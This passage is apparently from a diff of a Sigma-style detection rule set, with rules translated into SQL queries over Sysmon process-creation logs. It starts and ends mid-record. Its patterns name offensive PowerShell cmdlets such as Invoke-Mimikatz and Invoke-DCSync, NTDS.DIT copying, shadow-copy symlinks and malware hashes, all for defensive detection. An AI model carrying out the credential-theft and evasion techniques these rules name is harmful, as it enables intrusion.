"attack.t1059.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", - "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1216" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ + "attack.privilege_escalation", "attack.credential_access", - "attack.t1003.003" + "attack.t1212" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "status": "test", - "description": "Detecting Emotet DLL loading by looking 